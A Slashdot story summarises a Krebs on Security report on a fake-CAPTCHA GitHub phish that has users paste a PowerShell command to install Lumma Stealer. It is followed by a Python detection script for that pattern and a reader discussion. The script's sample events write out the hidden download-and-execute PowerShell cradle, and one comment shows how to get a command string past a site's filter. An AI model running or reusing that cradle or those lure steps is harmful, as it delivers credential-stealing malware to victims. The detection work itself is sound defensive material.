Windows PowerShell Phish Uses Fake CAPTCHA, Downloads Credential Stealer (krebsonsecurity.com)
"Many GitHub users this week received a novel phishing email warning of critical security holes in their code," reports Krebs on Security — citing an email shared by one of his readers:
"Hey there! We have detected a security vulnerability in your repository. Please contact us at https://github-scanner[.]com to get more information on how to fix this issue...." Clicking the "I'm not a robot" button generates a pop-up message asking the user to take three sequential steps to prove their humanity. Step 1 involves simultaneously pressing the keyboard key with the Windows icon and the letter "R," which opens a Windows "Run" prompt that will execute any specified program that is already installed on the system.
Step 2 asks the user to press the "CTRL" key and the letter "V" at the same time, which pastes malicious code from the site's virtual clipboard. Step 3 — pressing the "Enter" key — causes Windows to launch a PowerShell command, and then fetch and execute a malicious file from github-scanner[.]com called "l6e.exe...." According to an analysis at the malware scanning service Virustotal.com, the malicious file downloaded by the pasted text is called Lumma Stealer, and it's designed to snarf any credentials stored on the victim's PC.
Even though this might fool some users, Krebs points out that Microsoft "strongly advises against nixing PowerShell because some core system processes and tasks may not function properly without it. What's more, doing so requires tinkering with sensitive settings in the Windows registry..."
Thanks to long-time Slashdot reader sinij for sharing the article.
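A detection-side counterpart to the chain described in the summary, added here as an example and not code from the article or from Krebs on Security. It scores Sysmon-style process-creation events for the explorer.exe → powershell.exe parent/child shape that the Run dialog produces, plus command-line traits of a download-and-execute cradle (hidden window, encoded command, web download, URL). The sample events, the " | "-separated line layout, the indicator weights and the verdict thresholds are all this example's own assumptions; the only values taken from the story are the defanged domain and the file name.

```python
import re

# Constructed sample events (Sysmon Event ID 1 field names; the key=value
# layout separated by " | " is an assumption made for this example).
SAMPLE_EVENTS = [
    # 1. The chain in the story: the Run dialog (hosted by explorer.exe) spawns
    #    a hidden PowerShell that fetches and launches a binary. Domain and
    #    file name are the ones from the story, defanged as the story does.
    'EventID=1 | ParentImage=C:\\Windows\\explorer.exe'
    ' | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    ' | CommandLine=powershell -w hidden -c "iwr https://github-scanner[.]com/l6e.exe'
    ' -OutFile $env:TEMP\\l6e.exe; Start-Process $env:TEMP\\l6e.exe"',
    # 2. A user opening an interactive PowerShell from the Run dialog.
    'EventID=1 | ParentImage=C:\\Windows\\explorer.exe'
    ' | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    ' | CommandLine=powershell',
    # 3. A build script run from a developer's cmd.exe session.
    'EventID=1 | ParentImage=C:\\Windows\\System32\\cmd.exe'
    ' | Image=C:\\Program Files\\PowerShell\\7\\pwsh.exe'
    ' | CommandLine=pwsh -ExecutionPolicy Bypass -File .\\build.ps1',
    # 4. Encoded command from the Run dialog (the payload is a constructed
    #    placeholder string, not a real encoded script).
    'EventID=1 | ParentImage=C:\\Windows\\explorer.exe'
    ' | Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe'
    ' | CommandLine=powershell -NoProfile -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQQ==',
]

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (regex, reason, weight): command-line traits of a download-and-execute
# cradle. The weights are this example's own choice, not a published rule.
INDICATORS = [
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), "hidden window", 2),
    (re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command", 3),
    (re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I), "execution policy bypass", 2),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "invoke-expression", 2),
    (re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring"
                r"|downloadfile|net\.webclient|start-bitstransfer)\b", re.I), "web download", 3),
    (re.compile(r"https?://", re.I), "URL in command line", 1),
]


def parse_event(line):
    """Split 'Key=Value | Key=Value' into a dict; values may themselves contain '='."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(event):
    """Return (score, reasons) for one parsed process-creation event."""
    if basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return 0, []
    score, reasons = 0, []
    # The Run dialog is hosted by explorer.exe, so explorer -> powershell is the
    # shape this lure produces. A desktop shortcut produces the same shape, so
    # the parent only adds weight; it is not a verdict on its own.
    if basename(event.get("ParentImage", "")) == "explorer.exe":
        score += 2
        reasons.append("spawned by explorer.exe (Run dialog / shell)")
    cmdline = event.get("CommandLine", "")
    for pattern, reason, weight in INDICATORS:
        if pattern.search(cmdline):
            score += weight
            reasons.append(reason)
    return score, reasons


def verdict(score):
    if score >= 6:
        return "high"
    if score >= 4:
        return "medium"
    return "low"


def triage(lines):
    """Score every event line and return one result dict per event, in order."""
    results = []
    for line in lines:
        event = parse_event(line)
        score, reasons = score_event(event)
        results.append({"verdict": verdict(score), "score": score, "reasons": reasons,
                        "command_line": event.get("CommandLine", "")})
    return results


if __name__ == "__main__":
    for r in triage(SAMPLE_EVENTS):
        print(f"[{r['verdict']:6}] score={r['score']} {r['command_line'][:70]}")
        for reason in r["reasons"]:
            print("         -", reason)
```

Run as written, the first sample scores high (explorer parent, hidden window, web download, URL), the encoded-command sample medium, and the interactive shell and the build script low. In a real deployment the command-line indicators would be matched against Sysmon or PowerShell Script Block Logging (Event 4104) rather than constructed lines, and the weights tuned to the environment's baseline of explorer-launched PowerShell.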
This is daft (Score:5, Funny)
OMG. Here user, here's the instructions to let me hack your computer.
Re: (Score:2)
Being clueless comes with increased risk in life. This applies to small and big things.
Not quite so simple (Score:3)
The problem is cluelessness isn't entirely what's involved.
Nowadays a lot of modern Captchas ask absolutely trivial tasks ("align the puzzle piece to the image") and don't rely on successful completion of the task, but on subtle timing of the inputs.
It would be trivial to solve the task itself in a 1-liner in Perl (or in Python for modern kids, but with more spaces), but the sudden jumps and smooth linear motion of the pointer would be going through a classifier that would notice the synthetic origin of th
Re: (Score:2)
OMG. Here user, here's the instructions to let me hack your computer.
Well you say OMG, but the reality is this is how the vast majority of hacks occur right now. Oh look my phone is ringing Microsoft support called me about a virus on my computer, this is important, brb.
Re: (Score:1)
Re: This is daft (Score:2)
I'm sorry, but fools who fall for this have no business being on GitHub at all.
PowerShell for Linux (Score:2)
If you're not smart enough to recognize an 'execute' command, you're not smart enough to own a GitHub account.
With the Linux UI now being Windows-like, does this work (assuming PowerShell for Linux is installed)?
Linux (Score:2)
Doesn't work, for a much more simple reason that is common across all the non-Windows / non-MacOS world, so not only Linux, but BSD, and everything else:
other OSes tend to be a lot less monoculture.
To try the same scam on Linux you would need to account for the gazillion different graphical interfaces and shells that exist (e.g.: on my Plasma install "Alt-F2" is instead bringing a quick-run pop-up that can be used to run commands) and that's without even starting with the even crazier diversity brought by en
Re: (Score:2)
You're absolutely right, but that only really covers the "CTRL+R" part. Could replace that instruction with "Open a Terminal", with a link to a help page going over how to open a terminal on a variety of systems. Then, you can just have them paste in a command, much like the ones too many people put up for installing things outside of the package manager.
For example, here are the official instructions for installing Signal messaging app on a Debian based Linux system:
https://signal.org/download/# [signal.org]
Linux (Debian-based) Install Instructions
# NOTE: These instructions only work for 64-bit Debian-based
# Linux distributions such as Ubuntu, Mint etc.
# 1. Install our official public software signing key:
wget -O- https://updates.signal.org/des... | gpg --dearmor > signal-desktop-keyring.gpg
cat signal-desktop-keyring.gpg | sudo tee /usr/share/keyrings/signal-desktop-keyring.gpg > /dev/null
# 2. Add our repository to your list of repositories:
echo 'deb [arch=amd64 signed-by=/usr/share/keyrings/signal-desktop-keyring.gpg] https://updates.signal.org/des... xenial main' |\
sudo tee /etc/apt/sources.list.d/signal-xenial.list
# 3. Update your package database and install Signal:
sudo apt update && sudo apt install signal-desktop
Why do we
Re: Linux (Score:2)
The difference is that you came to the Signal website yourself for these instructions, and you had trust in Signal. Compare this to executing similar instructions from a random website that you visited due to a received email.
It's really the same as installing some non-free Un*x program by running some downloaded .run file, or in Windows, an .exe file. You need to be trusting the source of these files.
Even your Debian system can pwn you by running apt-get upgrade in the unlikely case that the Debian server
Re: (Score:2)
The difference is that you came to the Signal website yourself for these instructions, and you had trust in Signal. Compare this to executing similar instructions from a random website that you visited due to a received email.
But it doesn't need to be done in a way that is so similar to how this exploit is done, as I noted above.
The "from a random website" is the part where phishing is involved. People are tricked so that they don't know it's a random website or random email, but like someone they should trust. The domain could look very similar to "signal.com" and be sent in a phishing email. And if the process looks just like the process that a security focused app or an enterprise level VM app uses, then they have less reason
CAPTCHA (Score:2)
You're absolutely right, but that only really covers the "CTRL+R" part. Could replace that instruction with "Open a Terminal", with a link to a help page going over how to open a terminal on a variety of systems.
Bear the current context in mind: we're speaking about hacks that masquerade as Captchas, and extremely bored users who have been used to type random keys and click on trivial stuff with their mice as a modern form of input-timing Captchas.
Technically, yes: you could get a clueless Linux user to install an exploit by asking to open a terminal and giving documentation on how to install this.
BUT this will NOT be usable in the context of pretending to be a Captcha.
At best, this could work by pretending to be inst
Re: (Score:2)
You wouldn't need powershell, the same thing could be achieved in bash on linux just as easily. The difference is that linux users are on average more tech savvy and wouldn't fall for it.
What it really shows is that neither windows nor linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.
Re: (Score:2)
What it really shows is that neither windows nor linux are suitable systems for such users, and they would be better off with a walled garden system like ios or chromeos.
... because you can't open a terminal on either of those??? <HINT - you can>
Re: PowerShell for Linux (Score:2)
Don't have ideas to Ap*le about what user freedom to remove next to protect the dim-witted.
Re: (Score:2)
not a windows dev, but I think i fell for a joke Ctrl-W once, and almost for an Alt+F4. It's one of those things that if you haven't encountered it and if it hits you when you're not paying full attention or something, i think it can get you. Especially Ctrl-V, since prob many people don't even think "Ctrl-V" for paste ... they think "paste".
Nowadays i think there should prob. be more default indication of what's in the clipboard / when the clipboard content changes. (although there is some sens
Re: (Score:2)
I'd recommend Ditto [github.com] clipboard manager but it's Windows-only. It is open-source, so a Linux dev. could port it, if one wanted. ;)
I found so-called clipboard managers to be snippet managers / keyboard macros. That is, one has to move data in and out of a database, not re-use/replace the data in the clipboard. I am interested in an Android applet that changes the clipboard contents, similar to Ditto [sourceforge.io] (official web-page).
Probably works well on the average Windows "dev" (Score:4, Insightful)
These people are not very smart, after all. That apparently some want to remove PowerShell as a "countermeasure" just makes this even more obvious.
Re: (Score:2)
That's the typical clueless kneejerk response, block/remove something useful instead of learning how to use it properly.
Re: (Score:3)
Re: (Score:2)
You laugh, but the Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users -- including both PowerShell and the more traditional command prompt, which Slashdot/Cloudflare will not let me name, as specific examples (control ISM-1491).
Re: (Score:2)
Well, MS Office is basically a giant scripting engine. So is basically any web-browser. I guess somebody wasted money on "experts" there.
Re: (Score:2)
There are a bunch of security controls in the Australian ISM about the scripting engines inside Microsoft Office and about "active content" from the web, in addition to the one I mentioned.
When you assume, you make an ass out of yourself, at least.
Re: (Score:2)
Australian Information Security manual wants systems to remove "script execution engines" from all unprivileged users.
I had a crappy sales job long ago with a locked down Windows NT workstation, limited icons, and permissions. I pulled up Internet Exploder and typed cmd into the address bar, much hilarity ensued. Don't know if they could have locked out the net command too, but they hadn't. The RDP used didn't like a full screen cmd window so it didn't register, probably why MS killed full screen later on. Maybe they could kill the shell but I doubt it.
Idiots (Score:5, Funny)
Why was removing PowerShell even suggested? Why not just give instructions to remove the web browser and the email client? Problem solved!
Re: Idiots (Score:5, Funny)
Have you tried to uninstall Edge lately ?
Re: (Score:3)
It's actually pretty easy to completely uninstall Edge and any other unwanted Windows programs [ubuntu.com].
Re: (Score:2)
Followed it, but now Office won't install. Something went wrong. /s
Re: (Score:2)
Or better, just remove the Internet. :P
This is a big flaw in many OSes (Score:2)
Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default. Executing malware on these systems is no
Re:This is a big flaw in many OSes (Score:4, Interesting)
Every system should have implemented mandatory access controls to mitigate this type of thing by now.
It's not about access control. Both Windows and Linux try to separate administrative access from user access and for those who know the difference and how to use them, they pretty much work. But you gotta realize that a user must have access to their local directory, should be able to download files, and be able to execute them. If you don't allow them to do that, then you're not going to be considered a "user-friendly" O/S.
It shouldn't be that easy to get at the private data of end users without them knowing what application is requesting access, and them directly approving said access.
If a user is dumb enough to follow instructions as introduced by this hack, they surely are going to just answer "Yes" to any prompt that pops up.
Android, iOS, ChromeOS and even macOS got this right by providing cryptographically immutable base systems with the majority of running processes forbidden from touching users private data by default.
I suppose that's reasonable for self-contained applications, like those on the OSes you mentioned. But on the PC we tend to run many things which fall outside of that realm. Case in point, on the PC there's an application called Minion which doesn't really have its own data, but its purpose is to supplement other applications by allowing you to download plugins for them. And that's just one of the applications I use that are on my menu bar. Treating Windows or Linux like Android and iOS really does them a disservice.
Disclaimer: I am not a macOS user, so I really don't know how that handles this scenario.
Re: (Score:2)
a user must have access to their local directory, should be able to download files, and be able to execute them.
The problem (not only for naive users, but for all users) is how to know whether the executable they are downloading and executing will do what they expect vs something malicious?
Sure, in a scenario like this it is easy to scoff and say that the user should have picked up on the obvious clues, but it's not difficult to imagine a scenario where the methods for convincing the user to install and execute a malicious executable are sophisticated enough to fool even the most knowledgeable user. For example, one
Re: (Score:2)
You touched on 2 attack vectors. One is software from people you don't trust. For that, you're truly taking your chances, because you don't know if it'll take your document directory and upload it to some place. Heck, it even can be ransomware. But, in general, if it's from a place you trust, you tend to run it anyway. The solution to this is checksums, like those for various Linux distributions, and code signed by an authority you trust. The other scenario is you download something from a place you t
The solution is a bit more than that (Score:2)
Regarding the trusted-but-compromised scenario, even if the deve
Re: (Score:2)
I would say that the PC is an "open" platform while iPhone is a "closed" platform, with other platforms being in various places on the scale between the two.
The more "open" a platform is the more things a user can do with it, which opens up more risk to an uneducated user being exploited through social engineering, and there's nothing developers can do to mitigate this without compromising the openness of the platform. Either the user should move to a more limited closed platform for their own safety, givi
Re: (Score:2)
Re: (Score:2)
should be able to download files, and be able to execute them
On a general purpose OS aimed at geeks sure, on a consumer device no they shouldn't at least not by default.
Re: (Score:2)
You are confusing consumer device with appliance. Just because something is targeted at a consumer doesn't make it a locked down appliance.
Imagine your car not allowing you to drive down a certain road because the destination you want to go to is not on the approved list that General Motors has defined. Consumers, non-geeks, absolutely need to be able to download, execute and install things on their PCs. It is what makes them a PC instead of a kiosk.
Re: (Score:2)
Regular consumers don't open the hood of their car and change the air filters, despite it being a pretty easy job, and they certainly aren't going to try changing the brake pads on their own because messing that up could easily kill them (or someone else).
They pay someone else to do these things for them.
Regular consumers don't buy a collection of parts and assemble their own car to their own specifications, but there is a niche of people who will absolutely do that.
A general purpose computer is not a suita
Re: (Score:2)
Re: (Score:2)
It's an addon manager for Elder Scrolls Online and World of Warcraft. Much like NexusModManager was for Skyrim and a few other games. Here's more info [mmoui.com].
Websites can change the paste buffer? (Score:1)
Why would websites be allowed to put stuff into the paste buffer?
Re:Websites can change the paste buffer? (Score:5, Informative)
Why would websites be allowed to put stuff into the paste buffer?
Lots of websites place helpful information in the paste buffer.
Go to YouTube and click on the Share button. The shortened URL of the video will be placed in your copy buffer.
Go to Programiz for tutorials. Click the Copy button and the example code will be placed in your buffer.
Some sites disable normal copying but provide a "copy to clipboard" option, then they add their citation to the bottom of the copied text to help you give proper attribution to the source. There are other examples but this should be enough to see that not all clipboard interactions are for nefarious purposes.
Re: (Score:2)
Lots of websites place helpful information in the paste buffer.
Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.
Re: (Score:2)
Yep. Like "Copy Coupon Code". "Copy One-Time Code" (for use elsewhere). There are countless legit applications of this.
Why not simply let the user copy this information the normal way? Hardly legit given the huge potential for abuse, and given the trend that more and more applications nowadays tend to no longer make it obvious when they have lost the selection.
Re: (Score:2)
Re: Websites can change the paste buffer? (Score:1)
Sigh... Ok, I see that now, and the fact that this is abuseable makes me say - as I do far too often these days - "This is why we can't have nice things".
Can't protect against stupid (Score:2)
Subject says it all.
"Prove you are a human" (Score:2)
oh good (Score:2)
What the fuck? I was just blocked from posting this comment [pastebin.com]... It's always nice when your cloud security makes your site unusable.
Why have I been blocked?
This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution. There are several actions that could trigger this block including submitting a certain word or phrase, a SQL command or malformed data.
What can I do to resolve this?
You can email the site owner to let them know you
Re: oh good (Score:1)
Holy fuck that's stupid. Par for the course here now though I guess
Re: (Score:2)
You can't post cmd[.]exe in a comment on Slashdot. Bow down to your Cloudflare overlords, for some guy making $3 an hour at Cloudflare decided a simple regex is good security practice.
And their solution is garbage. You can post it using a simple NO BREAK tag, like: cmd.<nobr>exe /d
Example: cmd.exe mountvol C:
Re: (Score:2)
Great one, I didn't think of that myself. Now that's why I'm here damn it
Re: oh good (Score:2)
Welcome to the club of the annoyed by Cloudflare.
This is the price one pays for browsing the Sh!tternet these days, I guess ..
A security vulnerability in your repository. (Score:3)
PowerShell Commands (Score:2)
How do the bad guys always know which powershell commands work in all versions of powershell? I can't seem to ever figure out a way to ACTUALLY do anything in powershell because of how wacky it is.